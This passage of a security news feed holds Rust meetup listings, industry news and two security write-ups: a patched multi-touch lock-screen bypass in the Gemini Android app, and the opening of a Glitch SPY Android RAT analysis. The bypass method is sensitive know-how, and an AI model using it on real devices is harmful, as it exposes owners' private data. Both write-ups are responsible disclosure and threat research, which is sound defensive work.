<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-01 | Köln, DE | <a href="https://www.meetup.com/rust-cologne-bonn">Rust Cologne</a><ul>
<li><a href="https://www.meetup.com/rustcologne/events/315404678/"><strong>Rust in July: Vecs and Strings and Slices, Oh My!</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Manchester, UK | <a href="https://www.meetup.com/rust-manchester">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315200163/"><strong>Rust Manchester June Talks</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Oxford, UK | <a href="https://www.meetup.com/oxford-rust-meetup-group">Oxford ACCU/Rust Meetup.</a><ul>
<li><a href="https://www.meetup.com/oxford-rust-meetup-group/events/315409335/"><strong>Building a file system from scratch</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Edinburgh, UK | <a href="https://www.meetup.com/rust-edi">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314941098/"><strong>Bevy, Bits, &amp; Cats (Rust July Talks)</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Enschede, NL | <a href="https://www.meetup.com/dutch-rust-meetup">Baseflow Tech Meetups</a><ul>
<li><a href="https://www.meetup.com/baseflow-tech-meetups/events/315099547/"><strong>AI Summit</strong></a></li>
</ul>
</li>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a><ul>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-02 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/315103359/"><strong>Git is easy?</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225861/"><strong>Boston University Rust Lunch, July 4</strong></a></li>
</ul>
</li>
<li>2026-07-09 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696647/"><strong>Utah Rust July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-11 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225865/"><strong>MIT Rust Lunch, July 11</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>I <em>do</em> rather hope anyone using <code>-Zllvm-target-features</code> or any stabilized form thereof would know that they are getting a conversation with the dragon directly and they should mind their words carefully if they do not wish to be barbecued by it and served over a nice plate of iron filings.</p>
</blockquote>
<p>– <a href="https://rust-lang.zulipchat.com/#narrow/channel/233931-t-compiler.2Fmajor-changes/topic/Add.20.60-Zllvm-target-feature.60.20target.20.2Amodif.E2.80.A6.20compiler-team.23994/near/606147265">workingjubilee on rust zulip</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1784">Tomáš Šedovič</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1ul6xfl/this_week_in_rust_658/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quantifind has secured $200 million in a funding round led by Summit Partners.]]></title>
<description><![CDATA[Straiker has raised $64 million in a Series A round. F5 has acquired Denver-based AI governance firm SurePath AI.]]></description>
<link>https://tsecurity.de/de/3639583/it-security-nachrichten/quantifind-has-secured-200-million-in-a-funding-round-led-by-summit-partners/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639583/it-security-nachrichten/quantifind-has-secured-200-million-in-a-funding-round-led-by-summit-partners/</guid>
<pubDate>Wed, 01 Jul 2026 22:06:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Straiker has raised $64 million in a Series A round. F5 has acquired Denver-based AI governance firm SurePath AI.]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Efficient access to local storage for BPF programs]]></title>
<description><![CDATA[When a BPF program is used to filter or redirect packets in the networking
subsystem, the program will often want to associate data with each packet as it
moves through the kernel. The kernel's

local BPF storage API, which
associates extra data with some kernel objects, provides a way to do that...]]></description>
<link>https://tsecurity.de/de/3639267/linux-tipps/efficient-access-to-local-storage-for-bpf-programs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639267/linux-tipps/efficient-access-to-local-storage-for-bpf-programs/</guid>
<pubDate>Wed, 01 Jul 2026 19:09:59 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
When a BPF program is used to filter or redirect packets in the networking
subsystem, the program will often want to associate data with each packet as it
moves through the kernel. The kernel's
<a href="https://docs.ebpf.io/linux/helper-function/bpf_get_local_storage/">
local BPF storage API</a>, which
associates extra data with some kernel objects, provides a way to do that. (See also
the <a href="https://docs.kernel.org/bpf/maps.html">BPF map types</a> that end
in <tt>STORAGE</tt>.)
Amery Hung and Jakub Sitnicki led two sessions
at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage, Filesystem, Memory-Management, and BPF Summit</a>
about how to make accesses to local storage data more efficient. Hung spoke
about general performance problems related to locking, while Sitnicki examined
the use of local storage in the networking subsystem in particular.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Myths About AI in the SOC Security Teams Need to Rethink]]></title>
<description><![CDATA[AI is now part of almost every conversation in security operations. Most teams are already investing in it, experimenting with it, or trying to understand where it fits. The challenge is not whether to adopt AI, but how to apply it in a way that actually improves outcomes.At the Rapid7 Global Cyb...]]></description>
<link>https://tsecurity.de/de/3639078/it-security-nachrichten/5-myths-about-ai-in-the-soc-security-teams-need-to-rethink/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639078/it-security-nachrichten/5-myths-about-ai-in-the-soc-security-teams-need-to-rethink/</guid>
<pubDate>Wed, 01 Jul 2026 18:10:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>AI is now part of almost every conversation in security operations. Most teams are already investing in it, experimenting with it, or trying to understand where it fits. The challenge is not whether to adopt AI, but how to apply it in a way that actually improves outcomes.</span></p><p><span>At the Rapid7 Global Cybersecurity Summit, the session</span><a href="https://www.brighttalk.com/webcast/10457/662820?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-4-post-summit&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng" target="_blank"><span><em> The AI Dilemma: Automating Defense Without Surrendering Judgment</em></span></a><span> explores how AI is being used in the SOC today, and where it creates real value in practice.</span></p><p><span>The discussion centers on a set of assumptions that often shape how teams approach AI, and why those assumptions do not always hold up in real environments.</span></p><h2>Myth 1: AI will replace analysts</h2><p><span>Across the session, there is a consistent focus on how AI supports investigation workflows by reducing repetitive work and surfacing relevant context, allowing analysts to focus on decisions that require judgment. AI helps teams move faster, but responsibility and accountability still sit with people. TL;DR, the role of the analyst is evolving, but it is not disappearing.</span></p><h2>Myth 2: More automation means better security outcomes</h2><p><span>Automation is valuable when it is applied in the right places. In practice, teams are finding the most benefit in areas such as enrichment, summarization, and triage, where large volumes of data need to be processed quickly. High-impact actions such as containment or configuration changes still require oversight, particularly when they can affect production systems or business operations.</span></p><h2>Myth 3: Speed is more important than transparency</h2><p><span>As adoption increases, trust becomes more important and analysts need to understand how a conclusion was reached before they act on it, especially in high-pressure situations. The session highlights how explainability builds confidence over time, allowing teams to rely on AI outputs without losing control of the decision-making process.</span></p><h2>Myth 4: AI is only about efficiency gains</h2><p><span>Efficiency is part of the story, but the impact runs deeper. AI helps connect signals across fragmented environments, reduces cognitive load, and supports more consistent decision-making. It also changes how teams approach investigation by making it easier to surface patterns and identify relationships that would be difficult to see manually.</span></p><h2>Myth 5: Attackers benefit more from AI than defenders</h2><p><span>Both attackers and defenders are learning how to use AI, and both are moving quickly. What matters for security teams is how they apply it within their own workflows. The session explores how AI strengthens detection, investigation, and response when it is integrated into existing processes rather than treated as a standalone capability.</span></p><h2>Where AI creates real value in the SOC</h2><p><span>Across the discussion, a clear pattern emerges. AI delivers the most value when it is applied to high-volume, context-heavy tasks, where it can process data, highlight signals, and recommend next steps. Analysts remain central to interpreting those signals, understanding intent, and deciding how to respond.</span></p><p><span>This balance between automation and oversight is what allows teams to scale their operations without losing confidence in their decisions. It also reflects how AI is being adopted across the industry, with most organizations maintaining moderate to high levels of human involvement as they build trust in these systems.</span></p><p><span>For SOC leaders, practitioners, and teams exploring AI, the session offers a grounded view of how these technologies are being applied today, and how that approach is continuing to evolve.</span></p><p><a href="https://www.brighttalk.com/webcast/10457/662820?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-4-post-summit&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng" target="_blank"><span>Watch the full session</span></a><span> to explore how transparent AI supports better decisions in the SOC and how teams are applying it in practice.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New York City educators and industry leaders gathered at Google’s offices to shape the future of AI in classrooms.]]></title>
<description><![CDATA[Google, the New York Jobs CEO Council and Urban Assembly hosted an AI summit for 150 education and industry leaders.]]></description>
<link>https://tsecurity.de/de/3639011/it-nachrichten/new-york-city-educators-and-industry-leaders-gathered-at-googles-offices-to-shape-the-future-of-ai-in-classrooms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639011/it-nachrichten/new-york-city-educators-and-industry-leaders-gathered-at-googles-offices-to-shape-the-future-of-ai-in-classrooms/</guid>
<pubDate>Wed, 01 Jul 2026 18:03:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Summit_Photo_1.max-600x600.format-webp.webp">Google, the New York Jobs CEO Council and Urban Assembly hosted an AI summit for 150 education and industry leaders.]]></content:encoded>
</item>
<item>
<title><![CDATA[Is the Android Lock Screen an Illusion? A Critical Logical Bypass Discovered in the Gemini App]]></title>
<description><![CDATA[Image generated by Google GeminiNOTE: As of the publication of this article, the vulnerability has been fully patched, and all coordination regarding disclosure was managed directly with the Google VRP team.Introduction: “Security Architecture vs. The Real World”How can Android’s foundational sec...]]></description>
<link>https://tsecurity.de/de/3638146/hacking/is-the-android-lock-screen-an-illusion-a-critical-logical-bypass-discovered-in-the-gemini-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638146/hacking/is-the-android-lock-screen-an-illusion-a-critical-logical-bypass-discovered-in-the-gemini-app/</guid>
<pubDate>Wed, 01 Jul 2026 12:21:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9_XxbXU5gPX6wrq251_tIg.png"><figcaption>Image generated by Google Gemini</figcaption></figure><p><strong>NOTE:</strong> <em>As of the publication of this article, the vulnerability has been fully patched, and all coordination regarding disclosure was managed directly with the Google VRP team.</em></p><h3>Introduction: “Security Architecture vs. The Real World”</h3><p>How can Android’s foundational security layer, the Keyguard, falter when confronted with the complexity of a modern AI interface? The answer is simple: as systems grow more complex, the impact of overlooked edge cases amplifies.</p><p>In this write-up, I will dissect how a simple multi-touch interaction triggered a critical logical security flaw. I’ll provide the technical details of how this vulnerability bypassed the lock screen — the very boundary designed to be the most secure — and exposed sensitive user data.</p><h3>How I Discovered It</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/426/1*bfiQwfzmzuTXg4qGaLwLKA.gif"><figcaption><strong>Fig 1: </strong>Demonstration of the Multi-touch Bypass</figcaption></figure><p>I didn’t uncover this vulnerability using automated scanning utilities or complex fuzzing frameworks; rather, it surfaced organically during my daily user experience. I noticed that multi-finger interactions within the user interface triggered benign functions that should have been restricted under specific device states. While an average user might dismiss this behavior as a transient UI glitch, to a security researcher, it signaled a potential flaw.</p><p>Further analysis revealed that invoking specific operational modes, such as Lyria or Deep Research, forced the application into a full-screen state. Initially, interaction was restricted, and the system prompted for credentials. However, applying the multi-touch technique I discovered earlier circumvented these constraints, granting unauthorized access to application settings and chat histories. By expanding the attack surface during my research, I confirmed that critical assets like NotebookLM notebooks and Gmail drafts were equally vulnerable, subsequently documenting and escalating these findings to Google.</p><h3>Technical Analysis</h3><p>Gemini’s modular features bypassed the system Keyguard due to an architectural misconfiguration. The application improperly exposed UI elements that should remain strictly inaccessible while the device is locked. Although the system repeatedly invoked the Keyguard to request authentication during these operations, I successfully bypassed the lock state by leveraging a form of <strong>Context Hijacking</strong>.</p><p>The root cause lies in inadequate validation of concurrent UI interactions. By maintaining an active press on a permitted interaction area (such as a text input field) while simultaneously tapping a restricted target element, the application failed to isolate the input contexts. This race-like UI interaction completely neutralized the application’s internal security control mechanisms, turning a seemingly minor interface bug into a robust logical bypass.</p><a href="https://medium.com/media/e9c63ce92d169f8571147826f68417cf/href">https://medium.com/media/e9c63ce92d169f8571147826f68417cf/href</a><h4><strong>Impact &amp; Exploitation Surface</strong></h4><p>During the initial phase of my research, the exploit vectors were limited to reading, deleting, or renaming historical chats, accessing Gemini’s core settings, and viewing profile data. However, digging deeper into the application’s ecosystem revealed a significantly more severe impact:</p><ul><li><strong>Arbitrary Creation of Gmail and Google Docs Drafts:</strong> Allowing unauthenticated data injection into core Google services.</li><li><strong>Unauthorized Access to NotebookLM:</strong> Exposing proprietary or highly sensitive personal and enterprise data stored within notebooks.</li><li><strong>Gem Execution:</strong> Triggering custom AI agents without owner authentication.</li><li><strong>Destructive Actions:</strong> Permanently deleting critical NotebookLM assets.</li></ul><p>The practical implications of this vulnerability present severe risks, including data exfiltration, advanced social engineering scenarios via unauthorized draft creation, and the compromise of enterprise-grade environments.</p><h3>Coordination and Disclosure Timeline</h3><p>Throughout the lifecycle of this vulnerability, I maintained an active and transparent line of communication with Google’s security team. Shortly after submission, my report was designated as a <strong>“Duplicate,”</strong> tied to an older legacy issue inherent to Android’s core component architecture. Despite my requests for verification regarding the unique interaction vector, the root cause was maintained as identical.</p><p>Nevertheless, I continued my research. Following a subsequent major Gemini update, I verified that the exploit remained active. Upon presenting this evidence, an immediate mitigation was deployed, removing the specific mode buttons from the locked interface. Roughly a month later, a comprehensive patch was pushed, completely resolving the underlying logic flaw. My subsequent regression testing confirmed that unauthorized multi-touch access had been completely mitigated, successfully concluding the lifecycle of the report.</p><h3>Key Takeaways and Conclusion</h3><p>This journey marked my very first experience within the bug bounty ecosystem. Uncovering this logical vulnerability taught me that security research extends far beyond hunting for code flaws; it is about navigating the disclosure process and understanding how even a “duplicate” report can be leveraged to harden a system’s overall security posture. It perfectly illustrated how seemingly decoupled, non-critical components can be chained together to form a high-severity exploit.</p><p>Analyzing Android’s security architecture and engaging with engineering teams on regression analysis during my first research attempt fundamentally shifted my perspective on information security. While this specific report did not yield a financial bounty, the true payout was invaluable: a deep dive into the inner workings of complex enterprise software and the discipline required to execute a responsible disclosure process.</p><p>This experience is merely the opening chapter of my career in security research. It stands as a reminder that no architecture is infallible, but through the vigilance of independent researchers, they can be made resilient. Security is never a static defense; it is a continuous cycle of curiosity, analysis, and refinement.</p><p><strong>NOTE:</strong> All PoC media provided in this article have been redacted to ensure user privacy and are presented solely for educational and security analysis purposes.</p><h3>📌 References &amp; Community</h3><p>If you want to check out my other security research, tools, or open-source projects, feel free to explore the links below:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/msalihberk/">github.com/msalihberk</a></li><li><strong>Previous Research:</strong> <a href="https://medium.com/meetcyber/shadowlab-a-modular-c2-framework-architecture-built-with-python-for-modern-cybersecurity-research-7acb496e6784">ShadowLab: A Modular C2 Framework Architecture Built with Python for Modern Cybersecurity Research</a></li><li><strong>Follow for More:</strong> Feel free to follow my Medium profile to get notified about my future security research, development projects, and technical write-ups.</li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9e7da290ea06" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/gemini-app-logical-lockscreen-bypass-9e7da290ea06">Is the Android Lock Screen an Illusion? A Critical Logical Bypass Discovered in the Gemini App</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Warum KI die Arbeit von COOs erschwert statt erleichtert]]></title>
<description><![CDATA[Auf dem Fortune COO Summit diskutieren operative Leiter von Nike, Sysco und Box über organisatorische Defizite und Kontrollverluste beim Einsatz von KI.

Tags: #Arbeit | #Künstliche Intelligenz]]></description>
<link>https://tsecurity.de/de/3636214/it-security-nachrichten/warum-ki-die-arbeit-von-coos-erschwert-statt-erleichtert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636214/it-security-nachrichten/warum-ki-die-arbeit-von-coos-erschwert-statt-erleichtert/</guid>
<pubDate>Tue, 30 Jun 2026 18:24:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/04/KI-Arbeitsplatz-1920-Shutterstock-2313038497.jpg" class="attachment-full size-full wp-post-image" alt="KI-Arbeitsplatz" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/04/KI-Arbeitsplatz-1920-Shutterstock-2313038497.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/04/KI-Arbeitsplatz-1920-Shutterstock-2313038497-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/04/KI-Arbeitsplatz-1920-Shutterstock-2313038497-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/04/KI-Arbeitsplatz-1920-Shutterstock-2313038497-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/04/KI-Arbeitsplatz-1920-Shutterstock-2313038497-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Warum KI die Arbeit von COOs erschwert statt erleichtert 1"></p>
    Auf dem Fortune COO Summit diskutieren operative Leiter von Nike, Sysco und Box über organisatorische Defizite und Kontrollverluste beim Einsatz von KI.

<p>Tags: <a href="https://www.it-daily.net/thema/arbeit">#Arbeit</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[6 Key Takeaways: Strengthening Public Safety Through Collective Defense]]></title>
<description><![CDATA[Here are six key takeaways from a CIS webinar for how U.S. SLTT agencies can strengthen public safety through collective defense.]]></description>
<link>https://tsecurity.de/de/3636178/it-security-nachrichten/6-key-takeaways-strengthening-public-safety-through-collective-defense/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636178/it-security-nachrichten/6-key-takeaways-strengthening-public-safety-through-collective-defense/</guid>
<pubDate>Tue, 30 Jun 2026 18:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Here are six key takeaways from a CIS webinar for how U.S. SLTT agencies can strengthen public safety through collective defense.]]></content:encoded>
</item>
<item>
<title><![CDATA[Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App]]></title>
<description><![CDATA[Executive Summary




Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as Glitch SPY, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.


Based on the Polish-language lure a...]]></description>
<link>https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</guid>
<pubDate>Tue, 30 Jun 2026 12:08:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Glitch SPY" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg 1200w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-768x384.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App 1"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, targeting users in Poland or Polish expats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The downloaded application functions as a dropper and installs the Glitch SPY payload after convincing the user to allow installation from unknown sources. Glitch SPY prompts the victim to enable Android Accessibility Service, which it abuses to automate permission grants, interact with the device UI, extract visible screen content, perform gestures, support remote input, and enable further post-infection activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY maintains a persistent WebSocket channel to its C&amp;C server and supports over 70 commands spanning live screen streaming and remote control, screenshot and screen-reader capture, SMS, contact, call log, and location theft, camera and microphone surveillance, keylogging, file management, and shell execution.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Beyond standard surveillance, it includes a crypto-clipper that swaps copied wallet addresses across multiple blockchain formats, file encryption/decryption routines, device-unlock and credential-capture logic, and a hidden remote-browser capability that lets attackers conduct web-based account takeover from the victim's own device and IP.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder module lets operators set a custom app name, package ID, icon, and decoy URL per payload, indicating the platform is designed for redistribution across multiple campaigns, not a single targeted operation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121430,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-1-%E2%80%93-Glitch-SPY-Attack-Chain-1024x601.png" alt="Figure 1 – Glitch SPY Attack Chain" class="wp-image-121430"><figcaption class="wp-element-caption"><em>Figure 1 – Glitch SPY Attack Chain</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Key Takeaways<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Glitch SPY is an emerging Android RAT/builder platform identified through branding observed on an exposed C&amp;C admin panel.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware is distributed via a fake Polish rental app website that encourages users to download and install an APK outside official app stores.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The downloaded application is the Brokewell Android Loader, which acts as a dropper and deploys the Glitch SPY payload.</li>
